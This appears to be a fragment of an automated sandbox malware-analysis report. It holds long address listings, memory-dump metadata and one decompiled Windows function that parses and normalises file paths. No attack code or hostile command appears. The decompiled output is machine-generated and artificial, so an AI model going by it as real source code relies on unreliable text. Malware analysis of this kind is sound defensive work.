                                                                                                                                                    0x031962aa
                                                                                                                                                    0x031962b0
                                                                                                                                                    0x031962f0
                                                                                                                                                    0x031962f0
                                                                                                                                                    0x031962f2
                                                                                                                                                    0x031962f8
                                                                                                                                                    0x031962fd
                                                                                                                                                    0x031962b2
                                                                                                                                                    0x031962b2
                                                                                                                                                    0x031962b2
                                                                                                                                                    0x031962b5
                                                                                                                                                    0x031962dd
                                                                                                                                                    0x031962e2
                                                                                                                                                    0x031962e5
                                                                                                                                                    0x031962b7
                                                                                                                                                    0x031962b8
                                                                                                                                                    0x031962bb
                                                                                                                                                    0x031962bd
                                                                                                                                                    0x031962c0
                                                                                                                                                    0x031962c4
                                                                                                                                                    0x031962cd
                                                                                                                                                    0x031962cd
                                                                                                                                                    0x031962c0
                                                                                                                                                    0x031962bb
                                                                                                                                                    0x031962b5
                                                                                                                                                    0x03196302
                                                                                                                                                    0x03196303
                                                                                                                                                    0x03196305
                                                                                                                                                    0x03196305
                                                                                                                                                    0x03196305
                                                                                                                                                    0x0319630c
                                                                                                                                                    0x0319630c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0319627e
                                                                                                                                                    0x03196269
                                                                                                                                                    0x03195eac
                                                                                                                                                    0x03195ebb
                                                                                                                                                    0x03195ebe
                                                                                                                                                    0x03195ecb
                                                                                                                                                    0x03195ecb
                                                                                                                                                    0x03195ece
                                                                                                                                                    0x03195ece
                                                                                                                                                    0x03195ed4
                                                                                                                                                    0x03195ed7
                                                                                                                                                    0x03195ed9
                                                                                                                                                    0x03195edb
                                                                                                                                                    0x03195edb
                                                                                                                                                    0x03195ee1
                                                                                                                                                    0x03195ee1
                                                                                                                                                    0x03195ee3
                                                                                                                                                    0x03195f20
                                                                                                                                                    0x03195f20
                                                                                                                                                    0x03195ee5
                                                                                                                                                    0x03195ee5
                                                                                                                                                    0x03195ee5
                                                                                                                                                    0x03195ee8
                                                                                                                                                    0x03195f11
                                                                                                                                                    0x03195f18
                                                                                                                                                    0x03195eea
                                                                                                                                                    0x03195eea
                                                                                                                                                    0x03195eed
                                                                                                                                                    0x03195ef2
                                                                                                                                                    0x03195ef8
                                                                                                                                                    0x03195efb
                                                                                                                                                    0x03195f0a
                                                                                                                                                    0x03195f0a
                                                                                                                                                    0x03195eed
                                                                                                                                                    0x03195ee8
                                                                                                                                                    0x03195f22
                                                                                                                                                    0x03195f28
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03195f30
                                                                                                                                                    0x03195f31
                                                                                                                                                    0x03195f37
                                                                                                                                                    0x03195f3a
                                                                                                                                                    0x03195f3d
                                                                                                                                                    0x03195f44
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03195f46
                                                                                                                                                    0x03195f48
                                                                                                                                                    0x03195f4d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03195f4d
                                                                                                                                                    0x03195dda
                                                                                                                                                    0x03195ddf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03195ddf
                                                                                                                                                    0x03195dd8
                                                                                                                                                    0x03195da7
                                                                                                                                                    0x03195da9
                                                                                                                                                    0x03195dac
                                                                                                                                                    0x03195dae
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03195db4
                                                                                                                                                    0x03195db4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03195db4
                                                                                                                                                    0x03195dae
                                                                                                                                                    0x03195d88
                                                                                                                                                    0x03195d8d
                                                                                                                                                    0x03196363
                                                                                                                                                    0x03196369
                                                                                                                                                    0x0319636a
                                                                                                                                                    0x03196370
                                                                                                                                                    0x03196372
                                                                                                                                                    0x0319637a
                                                                                                                                                    0x0319637b
                                                                                                                                                    0x0319637d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0319637f
                                                                                                                                                    0x03196385
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03196385
                                                                                                                                                    0x03195d38
                                                                                                                                                    0x03195d3b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03195d3b
                                                                                                                                                    0x03195d27
                                                                                                                                                    0x03195d29
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03196360
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03196360
                                                                                                                                                    0x03195c10
                                                                                                                                                    0x03195c10
                                                                                                                                                    0x031963da
                                                                                                                                                    0x031963e5
                                                                                                                                                    0x031963e5

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: df4ec15c75788b421fe3954ffb5c67acacc18c5233f20958713f6d44551b9ea8
                                                                                                                                                    • Instruction ID: 8e59e4ac3f730fac0c8e5f03d42557d7aedf034facc37887171c6912817e7a05
                                                                                                                                                    • Opcode Fuzzy Hash: df4ec15c75788b421fe3954ffb5c67acacc18c5233f20958713f6d44551b9ea8
                                                                                                                                                    • Instruction Fuzzy Hash: 80424C75D00229CFEB25CF68C881BA9F7B1FF49314F1981AAD84DAB241D7749A85CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030E4120, Relevance: .4, Instructions: 444COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                    			E030E4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x31bd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E030FF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E030E6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L030E4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E030E6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M030E45F8))) {
												case 0:
													_v568 = 0x30a1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x30a11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L030E4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0310F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0310F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E030C52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E030DEB70(1, 0x31b79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E030DAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E031095D0();
																			L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0310B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03103D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0310B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                                                                                    0x030e4128
                                                                                                                                                    0x030e4135
                                                                                                                                                    0x030e413c
                                                                                                                                                    0x030e4141
                                                                                                                                                    0x030e4145
                                                                                                                                                    0x030e4147
                                                                                                                                                    0x030e414e
                                                                                                                                                    0x030e4151
                                                                                                                                                    0x030e4159
                                                                                                                                                    0x030e415c
                                                                                                                                                    0x030e4160
                                                                                                                                                    0x030e4164
                                                                                                                                                    0x030e4168
                                                                                                                                                    0x030e416c
                                                                                                                                                    0x030e417f
                                                                                                                                                    0x030e4181
                                                                                                                                                    0x030e446a
                                                                                                                                                    0x030e446a
                                                                                                                                                    0x030e418c
                                                                                                                                                    0x030e4195
                                                                                                                                                    0x030e4199
                                                                                                                                                    0x030e4432
                                                                                                                                                    0x030e4439
                                                                                                                                                    0x030e443d
                                                                                                                                                    0x030e4442
                                                                                                                                                    0x030e4447
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e419f
                                                                                                                                                    0x030e41a3
                                                                                                                                                    0x030e41b1
                                                                                                                                                    0x030e41b9
                                                                                                                                                    0x030e41bd
                                                                                                                                                    0x030e45db
                                                                                                                                                    0x030e45db
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e41c3
                                                                                                                                                    0x030e41c3
                                                                                                                                                    0x030e41ce
                                                                                                                                                    0x030e41d4
                                                                                                                                                    0x0312e138
                                                                                                                                                    0x0312e13e
                                                                                                                                                    0x0312e169
                                                                                                                                                    0x0312e16d
                                                                                                                                                    0x0312e19e
                                                                                                                                                    0x0312e16f
                                                                                                                                                    0x0312e16f
                                                                                                                                                    0x0312e175
                                                                                                                                                    0x0312e179
                                                                                                                                                    0x0312e18f
                                                                                                                                                    0x0312e193
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312e199
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312e199
                                                                                                                                                    0x0312e193
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e41da
                                                                                                                                                    0x030e41da
                                                                                                                                                    0x030e41df
                                                                                                                                                    0x030e41e4
                                                                                                                                                    0x030e41ec
                                                                                                                                                    0x030e4203
                                                                                                                                                    0x030e4207
                                                                                                                                                    0x0312e1fd
                                                                                                                                                    0x030e4222
                                                                                                                                                    0x030e4226
                                                                                                                                                    0x0312e1f3
                                                                                                                                                    0x0312e1f3
                                                                                                                                                    0x030e422c
                                                                                                                                                    0x030e422c
                                                                                                                                                    0x030e4233
                                                                                                                                                    0x0312e1ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e4239
                                                                                                                                                    0x030e4239
                                                                                                                                                    0x030e4239
                                                                                                                                                    0x030e4239
                                                                                                                                                    0x030e4233
                                                                                                                                                    0x030e4226
                                                                                                                                                    0x030e41ee
                                                                                                                                                    0x030e41ee
                                                                                                                                                    0x030e41f4
                                                                                                                                                    0x030e4575
                                                                                                                                                    0x0312e1b1
                                                                                                                                                    0x0312e1b1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e457b
                                                                                                                                                    0x030e457b
                                                                                                                                                    0x030e4582
                                                                                                                                                    0x0312e1ab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e4588
                                                                                                                                                    0x030e4588
                                                                                                                                                    0x030e458c
                                                                                                                                                    0x0312e1c4
                                                                                                                                                    0x0312e1c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e4592
                                                                                                                                                    0x030e4592
                                                                                                                                                    0x030e4599
                                                                                                                                                    0x0312e1be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e459f
                                                                                                                                                    0x030e459f
                                                                                                                                                    0x030e45a3
                                                                                                                                                    0x0312e1d7
                                                                                                                                                    0x0312e1e4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e45a9
                                                                                                                                                    0x030e45a9
                                                                                                                                                    0x030e45b0
                                                                                                                                                    0x0312e1d1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e45b6
                                                                                                                                                    0x030e45b6
                                                                                                                                                    0x030e45b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e45b6
                                                                                                                                                    0x030e45b0
                                                                                                                                                    0x030e45a3
                                                                                                                                                    0x030e4599
                                                                                                                                                    0x030e458c
                                                                                                                                                    0x030e4582
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e41f4
                                                                                                                                                    0x030e423e
                                                                                                                                                    0x030e4241
                                                                                                                                                    0x030e45c0
                                                                                                                                                    0x030e45c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e45ca
                                                                                                                                                    0x030e45ca
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312e207
                                                                                                                                                    0x0312e20f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e45d1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e45ca
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e4247
                                                                                                                                                    0x030e4247
                                                                                                                                                    0x030e4247
                                                                                                                                                    0x030e4249
                                                                                                                                                    0x030e4249
                                                                                                                                                    0x030e4249
                                                                                                                                                    0x030e4251
                                                                                                                                                    0x030e4251
                                                                                                                                                    0x030e4257
                                                                                                                                                    0x030e425f
                                                                                                                                                    0x030e426e
                                                                                                                                                    0x030e4270
                                                                                                                                                    0x030e427a
                                                                                                                                                    0x0312e219
                                                                                                                                                    0x0312e219
                                                                                                                                                    0x030e4280
                                                                                                                                                    0x030e4282
                                                                                                                                                    0x030e4456
                                                                                                                                                    0x030e45ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e45f0
                                                                                                                                                    0x0312e223
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312e223
                                                                                                                                                    0x030e445c
                                                                                                                                                    0x030e445c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e445c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e4288
                                                                                                                                                    0x030e428c
                                                                                                                                                    0x0312e298
                                                                                                                                                    0x030e4292
                                                                                                                                                    0x030e4292
                                                                                                                                                    0x030e429e
                                                                                                                                                    0x030e42a3
                                                                                                                                                    0x030e42a7
                                                                                                                                                    0x030e42ac
                                                                                                                                                    0x0312e22d
                                                                                                                                                    0x030e42b2
                                                                                                                                                    0x030e42b2
                                                                                                                                                    0x030e42b9
                                                                                                                                                    0x030e42bc
                                                                                                                                                    0x030e42c2
                                                                                                                                                    0x030e42ca
                                                                                                                                                    0x030e42cd
                                                                                                                                                    0x030e42cd
                                                                                                                                                    0x030e42d4
                                                                                                                                                    0x030e433f
                                                                                                                                                    0x030e433f
                                                                                                                                                    0x030e42d6
                                                                                                                                                    0x030e42d6
                                                                                                                                                    0x030e42d9
                                                                                                                                                    0x030e42dd
                                                                                                                                                    0x030e42eb
                                                                                                                                                    0x0312e23a
                                                                                                                                                    0x030e42f1
                                                                                                                                                    0x030e4305
                                                                                                                                                    0x030e430d
                                                                                                                                                    0x030e4315
                                                                                                                                                    0x030e4318
                                                                                                                                                    0x030e431f
                                                                                                                                                    0x030e4322
                                                                                                                                                    0x030e432e
                                                                                                                                                    0x030e433b
                                                                                                                                                    0x030e433b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e432e
                                                                                                                                                    0x030e42eb
                                                                                                                                                    0x030e434c
                                                                                                                                                    0x030e434e
                                                                                                                                                    0x030e4352
                                                                                                                                                    0x030e4359
                                                                                                                                                    0x030e435e
                                                                                                                                                    0x030e4361
                                                                                                                                                    0x030e436e
                                                                                                                                                    0x030e438a
                                                                                                                                                    0x030e438e
                                                                                                                                                    0x030e4396
                                                                                                                                                    0x030e439e
                                                                                                                                                    0x030e43a1
                                                                                                                                                    0x030e43ad
                                                                                                                                                    0x030e43bb
                                                                                                                                                    0x030e43bb
                                                                                                                                                    0x030e43ad
                                                                                                                                                    0x030e436e
                                                                                                                                                    0x030e43bf
                                                                                                                                                    0x030e43c5
                                                                                                                                                    0x030e4463
                                                                                                                                                    0x030e4463
                                                                                                                                                    0x030e43ce
                                                                                                                                                    0x030e43d5
                                                                                                                                                    0x030e43d9
                                                                                                                                                    0x030e43df
                                                                                                                                                    0x030e4475
                                                                                                                                                    0x030e4479
                                                                                                                                                    0x030e4491
                                                                                                                                                    0x030e4491
                                                                                                                                                    0x030e4479
                                                                                                                                                    0x030e43e5
                                                                                                                                                    0x030e43eb
                                                                                                                                                    0x030e43f4
                                                                                                                                                    0x030e43f6
                                                                                                                                                    0x030e43f9
                                                                                                                                                    0x030e43fc
                                                                                                                                                    0x030e43ff
                                                                                                                                                    0x030e44e8
                                                                                                                                                    0x030e44ed
                                                                                                                                                    0x030e44f3
                                                                                                                                                    0x0312e247
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e44f9
                                                                                                                                                    0x030e4504
                                                                                                                                                    0x030e4508
                                                                                                                                                    0x030e450f
                                                                                                                                                    0x0312e269
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e4515
                                                                                                                                                    0x030e4519
                                                                                                                                                    0x030e4531
                                                                                                                                                    0x030e4534
                                                                                                                                                    0x030e4537
                                                                                                                                                    0x030e453e
                                                                                                                                                    0x030e4541
                                                                                                                                                    0x030e454a
                                                                                                                                                    0x0312e255
                                                                                                                                                    0x0312e255
                                                                                                                                                    0x0312e25b
                                                                                                                                                    0x0312e25e
                                                                                                                                                    0x0312e261
                                                                                                                                                    0x0312e261
                                                                                                                                                    0x030e4555
                                                                                                                                                    0x030e4559
                                                                                                                                                    0x030e455d
                                                                                                                                                    0x0312e26d
                                                                                                                                                    0x0312e270
                                                                                                                                                    0x0312e274
                                                                                                                                                    0x0312e27a
                                                                                                                                                    0x0312e27d
                                                                                                                                                    0x0312e28e
                                                                                                                                                    0x0312e28e
                                                                                                                                                    0x030e4563
                                                                                                                                                    0x030e4563
                                                                                                                                                    0x030e4569
                                                                                                                                                    0x030e4569
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e455d
                                                                                                                                                    0x030e450f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e44f3
                                                                                                                                                    0x030e43ff
                                                                                                                                                    0x030e4405
                                                                                                                                                    0x030e4405
                                                                                                                                                    0x030e4405
                                                                                                                                                    0x030e42ac
                                                                                                                                                    0x030e428c
                                                                                                                                                    0x030e4282
                                                                                                                                                    0x030e4407
                                                                                                                                                    0x030e440d
                                                                                                                                                    0x0312e2af
                                                                                                                                                    0x0312e2af
                                                                                                                                                    0x030e4413
                                                                                                                                                    0x030e4413
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e41d4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e41c3
                                                                                                                                                    0x030e41bd
                                                                                                                                                    0x030e4415
                                                                                                                                                    0x030e4415
                                                                                                                                                    0x030e4416
                                                                                                                                                    0x030e4417
                                                                                                                                                    0x030e4429
                                                                                                                                                    0x030e416e
                                                                                                                                                    0x030e416e
                                                                                                                                                    0x030e4175
                                                                                                                                                    0x030e4498
                                                                                                                                                    0x030e449f
                                                                                                                                                    0x0312e12d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312e133
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312e133
                                                                                                                                                    0x030e44a5
                                                                                                                                                    0x030e44a5
                                                                                                                                                    0x030e44aa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e44bb
                                                                                                                                                    0x030e44ca
                                                                                                                                                    0x030e44d6
                                                                                                                                                    0x030e44d7
                                                                                                                                                    0x030e44d8
                                                                                                                                                    0x030e44e3
                                                                                                                                                    0x030e44e3
                                                                                                                                                    0x030e44aa
                                                                                                                                                    0x030e417b
                                                                                                                                                    0x030e417b
                                                                                                                                                    0x030e417b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e417b
                                                                                                                                                    0x030e4175
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4bf191b295abb88b7bdc3da7d10b201e93fb507bad2821b133cf98bf77737bd2
